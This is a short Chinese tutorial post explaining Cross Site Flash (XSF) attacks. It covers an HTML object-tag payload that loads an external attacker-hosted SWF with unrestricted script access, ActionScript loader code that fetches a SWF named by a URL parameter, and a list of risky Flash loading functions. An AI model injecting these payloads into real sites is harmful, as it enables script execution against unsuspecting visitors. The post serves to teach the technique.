前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >XSF简单利用说明

XSF简单利用说明

作者头像
用户1467662
发布2018-03-30 12:23:42
1.3K0
发布2018-03-30 12:23:42
举报
文章被收录于专栏:农夫安全农夫安全农夫安全

0x00 前言

小白一枚前段时间遇到的,然后在网上查了资料询问了别人,做个简单的小总结。

0x01 XSF概念

XSF即Cross Site Flash,就是使用ActionScript加载第三方的Flash文件时,攻击者能控制这个第三方的Flash文件这样就有可能造成XSF攻击,以下函数如果使用不当就很容易产生XSF问题。在一些网站发帖或者评论的地方可加载FLASH文件的地方(不止flash文件),由于输入输出过滤不严格,而产生的跨站攻击。

0x02 Payload

aaaa<object><param NAME="allowscriptaccess" VALUE="always" /> 
<param NAME="movie" VALUE="http://xsst.sinaapp.com/xss2.swf" /></OBJECT>

这里直接使用xss.t.sinaapp.com/xss2.swf作者的swf,也可以自己构造,代码如下:

var param:Object = root.loaderInfo.parameters;
var swf:String = param["swf"];
var myLoader:Loader = new Loader();
var url:URLRequest = new URLRequest(swf);
myLoader.load(url);
addChild(myLoader);

0x03 例子

在这些函数中可能造成XSF攻击。

loadVariables()
loadMovie()
loadMovieNum()
FScrollPane.loadScrollContent()
LoadVars.send
XML.load('URL')
LoadVars.load('url')
Sound.loadSound('url')
NetStream.play('url')

在ActionScript2中可以使用loadMovie函数来加载第三方文件,在ActionScript3中,已经去掉这个函数,改由loader来进行外部数据处理,在HTML中嵌入flash时候IE下和非IE下也有所不同,IE下使用embed 非IE下使用object看下面例子。

html代码

<html>
<object id="lso" type="application/x-shockwave-Flash"
data="http://127.0.0.1/exmple/xss/1.swf">
<param name="movie" value = "http://127.0.0.1/exmple/xss/1.swf" />
<param name="allowScriptAccess" value="always" />
<param name="allowNetworking" value="all" />
<param
name="Flashvars" value="swf=http://xsst.sinaapp.com/xss2.swf"
</object>
</html>

在html中嵌入flash 时比较重要的两个参数allowScriptAccess和allowNetworking作用非别如下

allowScriptAccess:控制html页面与Flash页面的通讯。

always:html和Flash页面的通讯不做任何的限制;

samedomain:html和Flash同域的时候可以做通讯【这个值是默认值】;

never:html和Flash禁止通讯。

allowNetworking:控制Flash与外部的网络通讯。

all:Flash所有的网络API通讯接口都可用;

internal:navigateToURL,fscommand,ExternalInterface.call不可用;

none:所有的网络API不可用。

swf代码

var param:Object = root.loaderInfo.parameters;
var swf:String = param["swf"];
var myLoader:Loader = new Loader();
var url:URLRequest = new URLRequest(swf);
myLoader.load(url);
addChild(myLoader);

此时去访问在网站留言中上传构造好的swf(http://127.0.0.1/exmple/xss/1.swf)文件,就会调用http://xsst.sinaapp.com/xss2.swf来进行攻击。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2017-11-02,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全社区悦信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档